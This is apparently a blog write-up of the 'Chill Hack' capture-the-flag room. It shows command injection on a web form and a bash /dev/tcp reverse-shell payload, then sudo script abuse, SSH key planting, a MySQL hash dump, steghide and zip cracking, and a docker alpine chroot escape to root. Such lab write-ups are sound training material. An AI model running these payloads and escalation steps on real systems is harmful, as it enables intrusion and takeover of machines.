Chill Hack —

6 min readJul 29, 2021


Room link:

A quick enum to get started, I usually run as a basic, nmap, nikto, gobuster as a min.


21/tcp open ftp
22/tcp open ssh
80/tcp open http


/secret # Seem's intresting!

*replace your IP for the rooms IP

This page gives us a box with command execution (Easy!)

Trying other things like “ls” gives you…

Testing some more I quickly realise we can chain together commands using “;” ie:


I captured the request in burp suite and then tried a few payloads to get a reverse shell back. First I checked with a simple ping command for a result to prove the connection back.


sudo tcpdump -i tun0 icmp

Post request

POST /secret/ HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
Connection: close
Upgrade-Insecure-Requests: 1

Bingo! A reply!

└─$ sudo tcpdump -i tun0 icmp
[sudo] password for ac1d:
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
23:35:26.127709 IP > ICMP echo request, id 1871, seq 1, length 64
23:35:26.127742 IP > ICMP echo reply, id 1871, seq 1, length 64

Now I test payloads to see what pings back.

Reverse shell

Sending a bash rev shell we can get a reverse shell from the command injection we just found.



command=id;bash -c "/bin/bash -i >& /dev/tcp/ 0>&1"


Checking sudo -l as www-data shows us something interesting.

Matching Defaults entries for www-data on ubuntu:                                                                                                                                     env_reset, mail_badpass,                                                                                                                                                         secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin                                                                                                                                                 
User www-data may run the following commands on ubuntu: (apaar : ALL) NOPASSWD: /home/apaar/
www-data@ubuntu:/tmp$ cat /home/apaar/
echo "Welcome to helpdesk. Feel free to talk to anyone at any time!"
read -p "Enter the person whom you want to talk with: " personread -p "Hello user! I am $person, Please enter your message: " msg$msg 2>/dev/nullecho "Thank you for your precious time!"

We can run a script as the user apaar.
The script seems to read a name and add it to the person variable.
Then ask for a msg but never use it. 2>/dev/null 2=STDERR, so send all errors to nothing (but still executing).

I send another ping to myself to prove it's working.

Then I try simply /bin/bash for a shell as the user.

sudo -u apaar /home/apaar/

Now we upgrade our terminal. But also we want a better terminal, so read on.

python3 -c 'import pty;pty.spawn("/bin/bash")'

Get ssh access

Now seeing the .ssh/ folder is now writable I can add my ssh public key and just log in.

Kali box


Accept all defaults and then cat the key out.

cat ~/.ssh/id_rsa.pubssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDQq4KtSkrifBP5HFkQ+/zrsalHvnsNI1TvefMU92X06G6XN9E2fYajOuLq/0yV1Ak57ohnNQFXSFHQBV9tB0rTFDmhaHCaGuqX+ZSMvSwHwZW32OasxAMnJPbTzSCqli58JN+GdVd81PJPNHnva1Q2WZ/cnvfc<REDACTED>0yFWnTkjx4tAZV+DG27IiOTlJSe2rUFR/eRDI7kN3d2qDiqChI/7F+ld+lqZLEHOhagYSamwGGu0t+0H39COfLX5PfhMBMKKpaaR6FR8AdYvIw6yyoNjNfnnXU2977Cn7m/Zz/l7xy+KYXRng+JBtjDbyg4jXGc= ac1d@kali

Then on the attacking machine add it to the authorized_keys file.

cat <<EOF > authorized_keys
#paste the key here

Now connect to the ssh

ssh apaar@ -i ~/.ssh/id_rsa

A much better terminal

We can now get the user flag in /home/apaar/local.txt

Enum Round 2

Checking the rest of the system I saw the username and password for mysql in the index page for login.

Using the details we can log in and check the databases out.

mysql> show databases;
| Database |
| information_schema |
| mysql |
| performance_schema |
| sys |
| webportal |
5 rows in set (0.00 sec)
mysql> use webportal;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
| Tables_in_webportal |
| users |
1 row in set (0.00 sec)
mysql> select * from users;
| id | firstname | lastname | username | password |
| 1 | Anurodh | Acharya | Aurick | 7e53614ced3640d5de23f111806cc4fd |
| 2 | Apaar | Dahal | cullapaar | 686216240e5af30df0501e53c789a649 |

Let's see if we can crack the passwords.


Running linpeas again as apaar didn’t show much new at all. I spent hours looking and finding not much at all. I saw a port running on I hadn’t checked out yet, so started there.

This seemed the host an apache server on port 9001, which is owned by root user.

I started to check the images with stego techniques.

steghide info hacker-with-laptop_23-2147985341.jpg 
format: jpeg
capacity: 3.6 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "":
size: 750.0 Byte
encrypted: rijndael-128, cbc
compressed: yes

steghide extract -sf hacker-with-laptop_23-2147985341.jpg
Enter passphrase:
wrote extracted data to "".

Time to crack the .zip file. We can do this in a few ways.

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt hacker-with-laptop_23-2147985341.jpg 
found id e0ffd8ff, 'hacker-with-laptop_23-2147985341.jpg' is not a zipfile ver 2.xx, skipping
PASSWORD FOUND!!!!: pw == pass1wordunzip
[] source_code.php password:
inflating: source_code.php

We can get a base64 password from the file extracted.

Using that password for anurodh we can swap user accounts.
Running linpeas again as anurodh shows we can use docker and it's writable! (escape time)


Listing the images shows us some containers ready to roll.

I know i’ve used the alpine exploit to escape docker before.
We can run the docker cm mount it with bash and save no session. Then grab the last flag!

docker run -v /:/mnt --rm -it alpine chroot /mnt bash


Thanks for reading :)